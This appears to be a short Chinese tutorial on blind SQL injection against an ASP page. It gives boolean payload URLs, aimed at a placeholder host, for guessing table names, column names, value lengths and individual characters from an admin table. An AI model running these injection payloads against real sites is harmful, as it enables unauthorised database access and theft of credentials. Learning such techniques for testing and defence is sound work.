1. 程式人生 > >SQL注入--表的猜解

SQL注入--表的猜解

步驟

表名—>列名—>列長度—>具體值

例如:注入點 http://www.XX.com/index.asp?id=1

猜解表名:http://www.XX.com/index.asp?id=1 and exists select * from 猜測的表名
猜解列名:http://www.XX.com/index.asp?id=1 and exists select 猜測的列名 from 已知表名
猜測列長度:http://www.XX.com/index.asp?id=1 and select top 1 len(已知列名) from admin>猜測的值長度 如5
//TOP 子句用於規定要返回的記錄的數目。
//LEN 函式返回文字欄位中值的長度。
猜測具體值:http://www.XX.com/index.asp?id=1 and select top 1 asc(mid(列名,列數,1)) from admin> 猜測的ascll碼 如97


//mid(列名,行數,N)擷取第N位字元
//asc()將字元轉換為ascll碼